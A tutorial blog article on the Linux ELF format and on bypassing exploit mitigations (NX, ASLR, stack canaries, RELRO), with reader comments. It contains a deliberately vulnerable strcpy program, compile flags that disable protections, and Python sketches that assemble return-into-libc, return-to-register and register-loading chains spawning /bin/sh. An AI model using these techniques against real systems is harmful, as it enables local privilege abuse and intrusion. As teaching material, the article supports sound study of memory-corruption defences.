Newer systems make attackers' lives hard, and common exploitation techniques are getting harder to reproduce. This article gives a general overview of mitigation techniques and covers attacks on 32-bit x86 as a reference point for x86_64, in order to stick with today's constraints.
The first step is an analysis of the ELF file format. After that, we will talk about the protections and the ways to bypass them. To finish, we will introduce x86_64, which makes present-day exploitation more difficult.
Pre-requisites:
22/10/2016
Exploitations
Old is always better (for attackers)
Nonexecutable stack
Address Space Layout Randomization
Brute-force
Return-to-registers
Stack Canary
RELRO
The x86_64 fact and current systems hardening
References & Acknowledgements
Where is it used?
ELF covers object files (.o) and shared libraries (.so), and it is also used for loadable kernel modules. Listing 1 also shows which systems[4] have adopted the ELF format:
ELF Layout
An ELF file has at least two headers: the ELF header (Elf32_Ehdr/Elf64_Ehdr struct) and the program header (Elf32_Phdr/Elf64_Phdr struct)[5]. There is also the section header (Elf32_Shdr/Elf64_Shdr struct), which describes sections such as .text, .data, .bss and so on (we will describe them later).
http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/#comment-18585
As you can see in figure 1, there are two views. The linking view is partitioned into sections and is used when a program or library is linked. The sections hold the object file's information: data, instructions, relocation information, symbols, debugging information, and so on.
The execution view, on the other hand, is partitioned into segments and is used while a program runs. The program header, shown on the left, tells the kernel how to start the program: the kernel walks through the segments and loads them into memory (mmap).
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15,
Now let's focus on the ELF string. As you have probably noticed when running hexdump on any ELF file (such as /bin/ls), the file starts with 0x7f, followed by three bytes that encode the string ELF:
fluxiux@nyannyan:~$ hd -n 16 /bin/ls
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
The first 16 bytes form the identification field (which starts with the ELF magic), a way to identify an ELF file. But if bytes 1, 2 and 3 encode the string ELF, what do bytes 4, 5, 6, 7, 8 and 9 represent?
Just have a look at the elf.h source code:
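#define EI_CLASS        4       /* File class byte index */
#define ELFCLASSNONE    0       /* Invalid class */
#define ELFCLASS32      1       /* 32-bit objects */
#define ELFCLASS64      2       /* 64-bit objects */
#define ELFCLASSNUM     3
#define EI_DATA         5       /* Data encoding byte index */
#define ELFDATANONE     0       /* Invalid data encoding */
#define ELFDATA2LSB     1       /* 2's complement, little endian */
#define ELFDATA2MSB     2       /* 2's complement, big endian */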
We can confidently say that our file is an ELF of class 64, encoded in little endian, following the UNIX System V ABI standard, and padded with zero bytes. By the way, in case you had not guessed yet, what we have just decoded is the e_ident field of the Elf64_Ehdr structure.
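The byte-by-byte reading above can be replayed in a few lines of Python. This is only a sketch: the 16 bytes are copied from the hexdump of /bin/ls shown earlier, the index constants follow elf.h, and the helper name describe_ident is a hypothetical name chosen for this example.

```python
# Sketch: decode the 16-byte e_ident array taken from the hexdump above.
# Index constants follow elf.h; describe_ident is a hypothetical helper.
E_IDENT = bytes.fromhex("7f454c46020101000000000000000000")

EI_CLASS, EI_DATA, EI_VERSION, EI_OSABI, EI_ABIVERSION = 4, 5, 6, 7, 8
CLASSES = {0: "invalid", 1: "ELF32", 2: "ELF64"}
ENCODINGS = {0: "invalid", 1: "little endian", 2: "big endian"}


def describe_ident(ident: bytes) -> dict:
    """Return the identification fields of an ELF e_ident array."""
    if len(ident) < 16 or ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF identification block")
    return {
        "class": CLASSES.get(ident[EI_CLASS], "unknown"),
        "data": ENCODINGS.get(ident[EI_DATA], "unknown"),
        "version": ident[EI_VERSION],
        "osabi": ident[EI_OSABI],            # 0 means UNIX System V
        "abiversion": ident[EI_ABIVERSION],
        "padding": ident[9:16],              # remaining bytes, expected to be zero
    }


if __name__ == "__main__":
    for key, value in describe_ident(E_IDENT).items():
        print(f"{key}: {value}")
```

To try it on a real file, the first 16 bytes read with open(path, "rb").read(16) can be passed instead of the constant.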
#include <stdio.h>
main()
{
printf("huhu la charrue");
}
And produce an ELF object file, without linking it:
gcc toto.c -c
We will now use readelf from binutils, one of the most widely used tools (along with objdump) for analysing ELF files, to display every field. That will simplify our analysis, but if you are interested in dissecting ELF files yourself, you can look at libelf; we will also talk about some interesting Python libraries that do it much more quickly.
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              REL (Relocatable file)
  Machine:                           Advanced Micro Devices X86-64
The output is very explicit, but let's now try to identify these fields using our lovely hexdump tool (in warrior forensic style! or not):
fluxiux@nyannyan:~$ hd -n 64 toto
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 |..>.............|
00000020 00 00 00 00 00 00 00 00 38 01 00 00 00 00 00 00 |........8.......|
00000030 00 00 00 00 40 00 00 00 00 00 40 00 0d 00 0a 00 |....@.....@.....|
00000040
We already know the first line, but what can we say about the three others? In the second line, the first two bytes represent e_type. Indeed, if you look at elf.h, you will see that 01 00 in little-endian means: Relocatable file.
Now look at the next two bytes. We have 3e 00, which is 62 in decimal (3*16 + 14 = 62) and identifies the AMD x86-64 architecture:
#define EM_X86_64       62
Next comes the e_version field, with 01 00 00 00 as the value for the current version:
#define EV_CURRENT      1       /* Current version */
#define EV_NUM          2
Bytes 24 to 31 hold the entry point address (0x0 here, since the file is not linked yet). And we finish with the two most important things that we will talk about in this article:
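As a cross-check of the manual decoding, here is a minimal Python sketch that unpacks the same 64 bytes with the struct module. The bytes are copied from the hd -n 64 listing above, the field names follow the Elf64_Ehdr structure from elf.h, and the helper name parse_ehdr64 is hypothetical.

```python
import struct

# The 64 bytes printed by "hd -n 64" in the listing above.
HEADER = bytes.fromhex(
    "7f454c46020101000000000000000000"
    "01003e00010000000000000000000000"
    "00000000000000003801000000000000"
    "0000000040000000000040000d000a00"
)

# Elf64_Ehdr layout, little endian, no alignment padding ("<").
EHDR64_FORMAT = "<16sHHIQQQIHHHHHH"
EHDR64_FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
    "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)


def parse_ehdr64(raw: bytes) -> dict:
    """Unpack a 64-bit little-endian ELF header into a field dictionary."""
    size = struct.calcsize(EHDR64_FORMAT)  # 64 bytes
    return dict(zip(EHDR64_FIELDS, struct.unpack(EHDR64_FORMAT, raw[:size])))


if __name__ == "__main__":
    for name, value in parse_ehdr64(HEADER).items():
        if name != "e_ident":
            print(f"{name:12} = {value:#x}")
```

The section header offset (e_shoff), the number of section headers (e_shnum) and the program header fields come out of the same unpacking, which is why no program header shows up for this unlinked object (e_phnum is 0).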
Sections
Let's look at the sections of toto.o with the following command:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags
  [ 0]                   NULL             0000000000000000  00000000
       0000000000000000  0000000000000000
  [ 1] .text             PROGBITS         0000000000000000  00000040
       0000000000000018  0000000000000000  AX
As you can see, there are a lot of sections, each one described by an Elf64_Shdr entry:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags
  [ 0]                   NULL             0000000000000000  00000000
       0000000000000000  0000000000000000
  [ 1] .interp           PROGBITS         0000000000400238  00000238
       000000000000001c  0000000000000000   A
In this article, we will discover some important sections to target for any attack.
Relocations
Relocation modifies the memory image of the mapped segments so that they can be executed. As you saw before, some .rela.* sections describe where to patch the memory and how. Let's look at the different relocations using our favorite tool, readelf:
Info
Type
Info
Type
For more information, elf.h also describes the relocation types:
#define R_X86_64_NONE           0       /* No reloc */
[...]
#define R_X86_64_GLOB_DAT       6       /* Create GOT entry */
#define R_X86_64_JUMP_SLOT      7       /* Create PLT entry */
[...]
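The Info column printed by readelf packs two values together: the symbol index and the relocation type. The sketch below splits them the way the ELF64_R_SYM and ELF64_R_TYPE macros of elf.h do. The sample r_info value is a made-up illustration, not taken from the listing, and only three relocation types are named here.

```python
# Sketch: split an Elf64_Rela r_info value into symbol index and type,
# mirroring ELF64_R_SYM(i) = i >> 32 and ELF64_R_TYPE(i) = i & 0xffffffff.
RELOC_NAMES = {
    0: "R_X86_64_NONE",
    6: "R_X86_64_GLOB_DAT",
    7: "R_X86_64_JUMP_SLOT",
}


def split_r_info(r_info: int) -> tuple:
    """Return (symbol index, relocation type number, relocation type name)."""
    sym = r_info >> 32
    rtype = r_info & 0xFFFFFFFF
    return sym, rtype, RELOC_NAMES.get(rtype, "other")


if __name__ == "__main__":
    SAMPLE_R_INFO = 0x0000000100000007  # hypothetical value for illustration
    print(split_r_info(SAMPLE_R_INFO))
```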
Program Headers
The section header table is not loaded into memory, because neither the kernel nor the dynamic loader uses that table. To load a file into memory, the program headers provide the required information:
  Offset             VirtAddr           PhysAddr
As you can see, each program header corresponds to one segment, which contains one or more sections. But how does it work?
At the beginning, when the kernel sees the INTERP segment, it first loads the LOAD segments at the specified virtual addresses, then loads the segments of the program interpreter (/lib64/ld-linux-x86-64.so.2) and jumps to the interpreter's entry point. After that, the loader takes control and loads the libraries specified in LD_PRELOAD, as well as the needed libraries listed in the executable's DYNAMIC segment:
  Tag                Type                 Name/Value
0x0000000000000001 (NEEDED)
After the relocations, the loader invokes the INIT function of every library and then jumps to the executable's entry point.
For static binaries, there is less to say, because the kernel only loads the LOAD segments at their virtual addresses and then jumps to the entry point (easy eh?).
For more details, you can read an old but very good article on ELF dissection by Eric Youngdale, published in Linux Journal #13[6].
Exploitation
Old is always better (for attackers)
Once upon a time, you were at home, waiting for the rain to stop. As always, you googled for some interesting information (of course!) and you found a kind of bible: Smashing The Stack For Fun And Profit[7].
By identifying the stack address, putting your shellcode at the beginning, adding some padding and overwriting EIP, you could execute anything you wanted while exploiting a stack overflow. But times have changed, and you are now confronted with canaries, ASLR (Address Space Layout Randomization), non-executable stacks, RELRO (read-only relocations), PIE support, binary-to-text encoding, and so on.
Nonexecutable stack
To make the stack non-executable, we use the NX bit (No eXecute, on AMD) or the XD bit (eXecute Disable, on Intel). In figure 2, you can see that it corresponds to the most significant bit of a 64-bit Page Table Entry:
So when trying to exploit a stack-based overflow, you may be surprised to see that your shellcode does not do what you expected: that is the power of the NX bit (NX = 0: execute, NX = 1: no execute).
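To make the bit position concrete, here is a tiny sketch that tests bit 63 of a 64-bit page table entry. The two sample entries are invented values for illustration, and the helper name is hypothetical.

```python
# Sketch: the NX/XD bit is the most significant bit (bit 63) of a 64-bit PTE.
NX_BIT = 1 << 63


def is_no_execute(pte: int) -> bool:
    """Return True when the entry forbids instruction fetches (NX = 1)."""
    return bool(pte & NX_BIT)


if __name__ == "__main__":
    # Hypothetical page table entries, for illustration only.
    for pte in (0x8000000012345067, 0x0000000012345025):
        state = "no execute" if is_no_execute(pte) else "execute"
        print(f"{pte:#018x}: {state}")
```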
GNU_STACK      0x0000000000000000 0x0000000000000000  RW
As you can see, the only flags we get are Read and Write. You can set the eXecute flag with execstack -s [binaryfile] and see the difference (RWE).
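The RW and RWE strings are just a rendering of the p_flags field of the GNU_STACK program header. A minimal sketch of that mapping follows, using the PF_X, PF_W and PF_R values from elf.h. The helper names are hypothetical, and the output is compact (readelf itself pads missing flags with spaces).

```python
# Sketch: render program header flags the way the listing above shows them.
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def flags_to_str(p_flags: int) -> str:
    """Return a compact flag string such as 'RW' or 'RWE'."""
    out = ""
    if p_flags & PF_R:
        out += "R"
    if p_flags & PF_W:
        out += "W"
    if p_flags & PF_X:
        out += "E"
    return out


def stack_is_executable(gnu_stack_flags: int) -> bool:
    """True when the GNU_STACK segment requests an executable stack."""
    return bool(gnu_stack_flags & PF_X)


if __name__ == "__main__":
    for flags in (PF_R | PF_W, PF_R | PF_W | PF_X):
        print(flags_to_str(flags), "executable stack:", stack_is_executable(flags))
```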
To bypass it, we can use a method called return-into-libc. Indeed, any program linked against libc has access to its shared functions (such as printf, exit, and so on), and we can execute system("/bin/sh") to get a shell.
First, we fill the vulnerable buffer with some junk data up to EIP (AAAAAAAAAHH! is great). After that, we have to find the system() function; if we want to exit the program properly, exit() is needed too (using gdb):
(gdb) r main
Starting program: /home/fluxius/toto main
huhu la charrue
Program exited with code 017.
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff6b8a134 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x7ffff6b81890 <exit>
Then, we overwrite the return address with the address of system() and follow it with the address of exit(). To finish, we put the address of the string /bin/sh (which you can retrieve with a memcmp() search or from an environment variable).
Inject = [junk][system()][exit()][/bin/sh]
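The layout above can be sketched for a 32-bit target as follows. Every number in this example is a hypothetical placeholder (the offset to the saved return address and the three addresses depend on the target binary and libc), and build_ret2libc is a name invented for the illustration.

```python
import struct

# All values below are hypothetical placeholders, for illustration only.
OFFSET_TO_EIP = 64          # junk bytes before the saved return address
SYSTEM_ADDR = 0xB7E5F060    # address of system()
EXIT_ADDR = 0xB7E52BE0      # address of exit()
BINSH_ADDR = 0xB7F83A24     # address of a "/bin/sh" string


def build_ret2libc(offset: int, system_addr: int, exit_addr: int,
                   binsh_addr: int) -> bytes:
    """Build [junk][system()][exit()][/bin/sh] for 32-bit little-endian x86."""
    junk = b"A" * offset
    # system() sees exit() as its return address and binsh as its argument.
    return junk + struct.pack("<III", system_addr, exit_addr, binsh_addr)


if __name__ == "__main__":
    payload = build_ret2libc(OFFSET_TO_EIP, SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)
    print(len(payload), payload[-12:].hex())
```

With the 32-bit calling convention, the word right after the overwritten return address is where system() expects its own return address, which is why exit() sits between system() and the /bin/sh pointer.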
Note: on 32-bit x86, the NX bit is only available with Physical Address Extension (PAE), but it can be emulated by PaX or ExecShield.
Moreover, we will see later that on x86_64 platforms this return-into-libc layout does not work as is, because of the ABI specification[8]; that is probably a problem you have already encountered.
When performing a stack overflow, for example, you can disable ASLR by setting the current level to 0:
the kernel 2.6.18, was used to retrieve the address of any interesting pattern such as \xff\xe4 (jmp esp on x86) in memory. Other techniques to bypass ASLR exist, such as brute-force.
Brute-force
Thinking about the exec() family of functions, we can use execl to replace the current process image with a new one. Let's write some simple code to observe the randomization:
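#include <stdio.h>

int main(void)
{
    char buffer[100];
    /* Print where the buffer lives on the stack for this run */
    printf("Buffer address: %p\n", (void *)buffer);
    return 0;
}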
If ASLR is enabled, you should see something like this:
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff5e149710
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff71f6f0b0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff763299c0
We see that roughly 4 bytes change on each execution, so we would have to be very lucky to land in our shellcode by brute force. So we will now use execl to look for any weakness when the memory layout is randomized for the process:
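#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int stack;
    printf("Stack address: %p\n", (void *)&stack);
    /* Replace the current process image with buffer_addr */
    execl("./buffer_addr", "buffer_addr", (char *)NULL);
    return 1; /* only reached if execl() fails */
}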
Compare the memory layouts with different runs of buffer_addr:
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc5cfa180
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff1964d1f0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffba20bd30
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc8505ed0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7ffff39cbc10
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff6eb3aa90
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc5cfa180 - 0x7fff1964d1f0"
$1 = 2892681104
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc8505ed0 - 0x7fffba20bd30"
$1 = 238002592
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffff39cbc10 - 0x7fff6eb3aa90"
$1 = 2229866880
And now with execl function:
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fff526d959c
Buffer address: 0x7fff2e95efd0
fluxiux@handgrep:~/aslr$ gdb -q --batch -ex "p 0x7fffaffcde50 - 0x7fff54800abc"
$1 = 1534907284
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffdaf7d5fc - 0x7fff08361da0"
$1 = 3535911004
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7ffffbe8326c
Buffer address: 0x7fff792120c0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffffbe8326c - 0x7fff792120c0"
$1 = 2194084268
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffed12acfc - 0x7fffa3a4f8f0"
$1 = 1231926284
Using this method, we could fill the buffer with return addresses, add a large NOP sled followed by the shellcode after them, and guess an offset that lands in the sled. As you can see, the degree of randomization is not the same from one run to another, but you can play with that. Of course, this attack is more effective on 32-bit systems and on older kernel versions[9].
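The gdb subtractions above are easy to replay in bulk. The sketch below recomputes the distances for the address pairs that appear in the gdb command lines of the listings. The variable and function names are hypothetical, and nothing here measures a live system.

```python
# Sketch: recompute the distances shown in the gdb one-liners above.
# Pairs of buffer addresses from separate runs of buffer_addr.
SEPARATE_RUNS = [
    (0x7FFFC5CFA180, 0x7FFF1964D1F0),
    (0x7FFFC8505ED0, 0x7FFFBA20BD30),
    (0x7FFFF39CBC10, 0x7FFF6EB3AA90),
]
# (stack address, buffer address) pairs printed by weakaslr across execl().
ACROSS_EXECL = [
    (0x7FFFFBE8326C, 0x7FFF792120C0),
    (0x7FFFED12ACFC, 0x7FFFA3A4F8F0),
]


def distances(pairs):
    """Return the difference between the two addresses of each pair."""
    return [high - low for high, low in pairs]


if __name__ == "__main__":
    print("separate runs:", distances(SEPARATE_RUNS))
    print("across execl: ", distances(ACROSS_EXECL))
```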
If we dig a little deeper, we can narrow down the range of probable addresses using the /proc/self/maps file (local bypass), as shown below:
...
00fa8000-00fc9000 rw-p 00000000 00:00 0
[heap]
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libc-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/libutil-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
/lib/x86_64-linux-gnu/ld-2.13.so
[stack]
[vdso]
[vsyscall]
Unfortunately, this leak has been partially patched since 2.6.27 according to Julien Tinnes and Tavis Ormandy[10], and these files seem to be protected if you cannot ptrace the pid. However, there was another way, using /proc/self/stat and /proc/self/wchan, which leak information such as the stack pointer and instruction pointer (=> ps -eo pid,eip,esp,wchan); by sampling kstkeip, we could reconstruct the maps (see fuzzyaslr by Tavis Ormandy[11]).
Brute-forcing is always a very noisy way to get what you want: it takes time, and you should know that every attempt is recorded in the logs. The solution may lie in the registers.
Return-to-registers
Using a debugger like GDB can help you find other ways to bypass protections such as DEP, as shown previously, and of course ASLR. To study this case, we will work with a better example:
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
    char buffer[50];
    strcpy(buffer, string); // Guys! It's vulnerable!
}

int main(int argc, char **argv)
{
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}
By the way, don't forget to disable the stack protector (compile as follows: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=4 vuln2.c -o vuln2). We will see later what a canary is; for the moment, let's just focus on ASLR.
After a few tries, we see that we can overwrite the instruction pointer:
0x7fffffffe148 0x7fffffffe148
0x7fffffffe148 0x7fffffffe148
(gdb) stepi
0x00000000004004f8 in vuln ()
(gdb) info reg rax
rax            0x7fffffffe520   140737488348448
[...]
  400604:       ff d0                   callq  *%rax
[...]
The call at 0x400604 looks great: we just have to replace the junk data (A) with a NOP sled and a precious shellcode that fits in the buffer, and overwrite the instruction pointer with the address 0x400604. For 32-bit systems, Sickness has written a good article about this if you are interested[12].
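A rough sketch of how such a return-to-register payload could be assembled is shown below. Only the 0x400604 address comes from the listing above. The offset to the saved instruction pointer and the placeholder "shellcode" (a run of int3 bytes) are assumptions made for the example, and the sketch relies on the upper bytes of the saved return address already being zero, since strcpy() cannot copy NUL bytes.

```python
import struct

CALL_RAX_ADDR = 0x400604     # "callq *%rax" found in the disassembly above
OFFSET_TO_RIP = 72           # hypothetical distance from buffer start to saved RIP
SHELLCODE = b"\xcc" * 24     # placeholder bytes (int3), not a real shellcode


def build_ret2reg(offset: int, shellcode: bytes, target: int) -> bytes:
    """Build [NOP sled][shellcode][low bytes of target] without NUL bytes."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    sled = b"\x90" * (offset - len(shellcode))
    # strcpy() stops at the first NUL, so only the non-zero low bytes of the
    # little-endian address are sent; strcpy's own terminator follows them.
    addr = struct.pack("<Q", target).rstrip(b"\x00")
    payload = sled + shellcode + addr
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and would be truncated")
    return payload


if __name__ == "__main__":
    payload = build_ret2reg(OFFSET_TO_RIP, SHELLCODE, CALL_RAX_ADDR)
    print(len(payload), payload[-3:].hex())
```

Because rax still points at the start of the buffer when vuln() returns, jumping to the call instruction lands in the sled whatever the randomized stack address is.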
But as you know, by default on Linux (especially the user-friendly one: Ubuntu), programs are compiled with NX support, so you need to be lucky to use this technique on today's systems. We also used an option to disable the stack protector, but what is it exactly?
Stack Canary
Named by analogy with the canary in a coal mine, stack canaries are used to protect against stack overflow attacks. When compiling with the stack protector option (which is enabled by default), the prologue and epilogue of each dangerous function are modified.
If we compile the previous code with the stack protector enabled, we get something like this:
0x4005a6 <vuln+66>
Null (0x0),
terminator (with the first bytes set to \a0\xff),
random.
The first two kinds are easy to bypass[14]: you just have to fill the buffer with your shellcode, place the expected value at the right position, and overwrite the instruction pointer. The random one is a little more fun, because you have to guess its value on each execution (Ow! Something like ASLR?).
For random canaries, __guard_setup() fills a global variable with random bytes read from /dev/urandom, if possible. Later in the program, only 4 or 8 bytes are used as the cookie. But if the entropy of /dev/urandom cannot be used, we get a terminator or a null cookie by default.
Brute-force is one way, but it takes too much time. By overwriting further than the return address, we can hook the execution flow using GOT entries. The canary will of course detect the corruption, but too late. A very good article covering StackGuard and StackShield explains four ways to bypass these protections[15].
However, on recent kernels you should also notice that the random cookie ends with a null byte, so trying to recover the value through forking or brute-forcing will not work with functions like strcpy. The better way, then, is to control the initialized cookie.
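Why a null byte in the cookie hurts a strcpy-based overflow can be shown with a small simulation. Everything here is a toy model: the frame layout (16-byte buffer, 8-byte cookie, 8-byte return address), the cookie value and the helper names are assumptions made for the illustration, not the layout of a real binary.

```python
# Toy model of a stack frame: [buffer 16][cookie 8][saved return address 8].
BUF_SIZE, COOKIE_SIZE, RET_SIZE = 16, 8, 8
COOKIE = b"\x00" + bytes.fromhex("a1b2c3d4e5f607")   # hypothetical cookie with a NUL byte
OLD_RET = bytes.fromhex("f505400000000000")          # hypothetical saved return address


def new_frame() -> bytearray:
    return bytearray(b"\x00" * BUF_SIZE + COOKIE + OLD_RET)


def strcpy_like(memory: bytearray, src: bytes) -> None:
    """Copy src to the start of memory up to its first NUL, then add a NUL."""
    end = src.find(b"\x00")
    data = (src if end < 0 else src[:end]) + b"\x00"
    memory[0:len(data)] = data


def cookie_intact(memory: bytearray) -> bool:
    return bytes(memory[BUF_SIZE:BUF_SIZE + COOKIE_SIZE]) == COOKIE


def saved_ret(memory: bytearray) -> bytes:
    return bytes(memory[BUF_SIZE + COOKIE_SIZE:])


if __name__ == "__main__":
    # Attempt 1: the attacker knows the cookie and tries to write it back.
    frame = new_frame()
    strcpy_like(frame, b"A" * BUF_SIZE + COOKIE + b"\x04\x06\x40")
    print("known cookie :", cookie_intact(frame), saved_ret(frame) == OLD_RET)
    # Attempt 2: junk over the cookie reaches the return address, but is detected.
    frame = new_frame()
    strcpy_like(frame, b"A" * BUF_SIZE + b"B" * COOKIE_SIZE + b"\x04\x06\x40")
    print("junk cookie  :", cookie_intact(frame), saved_ret(frame) == OLD_RET)
```

In the first attempt the copy stops at the cookie's NUL byte, so the return address is never reached; in the second the return address is overwritten, but the cookie check fails.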
Format string vulnerabilities or heap overflows, for example, are easier to exploit with this protection in place, but this article is not finished yet, and we will now look at another memory corruption mitigation technique.
RELRO
Recent Linux distributions have introduced a memory corruption mitigation technique that hardens the data sections of binaries/processes. This protection can be seen by reading the program headers (with readelf, for example):
0x00000000000001d8 0x00000000000001d8 R
On current Linux systems, binaries are often compiled with RELRO. That means the following sections are mapped read-only:
[...]
Exploiting a format string bug, for example, using the %n format parameter to write to an arbitrary address such as a GOT entry, is supposed to fail. But as we noticed previously, the PLT GOT entries are still writable, so we are only facing partial RELRO.
With the example in trapkit's article about RELRO[16], we can see that it is very easy to overwrite a PLT entry. But in some cases (mostly in distribution packages), binaries are compiled with full RELRO:
The entire GOT is remapped read-only, but there are other sections to write to. GOTs are mostly used for flexibility. A detour through .dtors can be performed, as Sebastian Krahmer described in his article about RELRO[17].
We have seen the common Linux protections used by default, but the evolution of kernels and architectures has made things more difficult. As you noticed, addresses have changed, and some memory corruptions are more difficult to exploit because of the \x00 byte, which functions like strcpy() treat as the end of the string. We saw that NX is enabled and that gcc compiles with its support by default. But the worst is coming. Indeed, we know that the randomization space is larger, but what interests us is the System V ABI for x86_64[8].
Things have changed for function parameters. Instead of copying parameters onto the stack, the first 6 integer arguments and the first 8 float/double/vector arguments are passed in registers, and the rest go on the stack. See an example:
I suggest you read Jon Larimer's slides, Intro to x64 Reversing[18].
We can draw on the borrowed code chunks article[19], which helps to understand the problems posed by NX, the differences between the System V x86_64 ABI and 32-bit x86, and ways to bypass them using instructions that load a value into a register and then call a function such as system(), which will use this register as a parameter.
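The register rule and the resulting chain shape can be sketched together. The first helper models the simplified rule stated earlier (6 integer registers, 8 SSE registers, the rest on the stack) and ignores structs and other special cases of the ABI. The second lays out a chain in the spirit of the borrowed code chunks idea. The three addresses are hypothetical placeholders, and the existence of a "pop %rdi; ret" sequence in the target is an assumption.

```python
import struct

INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]
SSE_REGS = [f"xmm{i}" for i in range(8)]


def assign_arguments(kinds):
    """Map a list of 'int'/'float' argument kinds to registers or the stack."""
    ints, floats = iter(INT_REGS), iter(SSE_REGS)
    return [next(ints if kind == "int" else floats, "stack") for kind in kinds]


# Hypothetical addresses, for illustration only.
POP_RDI_RET = 0x00007FFFF7A3B2D1   # a "pop %rdi; ret" code chunk
BINSH_ADDR = 0x00007FFFF7B99D57    # a "/bin/sh" string
SYSTEM_ADDR = 0x00007FFFF7A5E390   # system()


def build_chain(pop_rdi_ret: int, binsh: int, system: int) -> bytes:
    """Return the qwords placed at the saved return address and after it."""
    # ret -> pop %rdi (loads binsh into rdi) -> ret -> system(rdi)
    return struct.pack("<QQQ", pop_rdi_ret, binsh, system)


if __name__ == "__main__":
    print(assign_arguments(["int"] * 7 + ["float"]))
    print(build_chain(POP_RDI_RET, BINSH_ADDR, SYSTEM_ADDR).hex())
```

Note that such addresses contain NUL bytes once packed, so a chain like this cannot go through strcpy() as is, which ties back to the \x00 problem mentioned above.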
Other sophisticated attacks such as Return-Oriented Programming are used to bypass these protections that make life difficult when writing an exploit.
As you can see, protections do not make things impossible, just harder and harder. So stay aware of newly applied protections and conventions to avoid wasting too much time.
[8] System V ABI for x86_64 http://www.x86-64.org/documentation/abi.pdf
[9] Hacking: The Art of Exploitation (by Jon Erickson)
[10] Local bypass of Linux ASLR through /proc information leaks http://blog.cr0.org/2009/04/local-bypass-of-linux-aslr-through-proc.html
[11] Fuzzy ASLR http://code.google.com/p/fuzzyaslr/
[12] ASLR bypass using ret2reg http://www.exploit-db.com/download_pdf/17049
[13] /dev/urandom http://en.wikipedia.org/wiki//dev/urandom
[14] Stack Smashing Protector (FreeBSD) http://www.hackitoergosum.org/2010/HES2010-prascagneres-Stack-Smashing-Protector-in-FreeBSD.pdf
[15] Four different tricks to bypass StackShield and StackGuard protection http://www.coresecurity.com/files/attachments/StackguardPaper.pdf
[16] RELRO: a (not so well known) memory corruption mitigation technique http://tk-blog.blogspot.com/2009/02/relro-not-so-well-known-memory.html
[17] RELRO by Sebastian Krahmer http://www.suse.de/%7Ekrahmer/relro.txt
[18] Intro to x64 reversing http://lolcathost.org/b/introx86.pdf
[19] x86-64 buffer overflow exploits and the borrowed code chunks http://www.suse.de/~krahmer/no-nx.pdf
It just misses one little trick to work around ASLR that I noticed under Linux. This is Linux-specific and won't work on any other POSIX system.
Basically, it plays with the process personality flags to mark a process as exempt from ASLR. The good thing is that you do not need to be the system administrator to switch it on and off. The bad thing is that it breaks if you try to apply it to setuid programs (for obvious security reasons).
The idea is that every process under Linux has personality flags that are inherited by all its children, and one of these flags controls whether ASLR is active. These flags are set through the setarch command (read man setarch to know more about it).
So, if you execute the following command, you will start a fresh shell environment where ASLR is totally deactivated: setarch `uname -m` --addr-no-randomize /bin/bash
I teach this trick to my students so that they can practice and try things out on systems where they do not have root access.
I'll put this trick in the article anyway. It's interesting to give people the possibility to disable ASLR as a simple user =)
Thank you!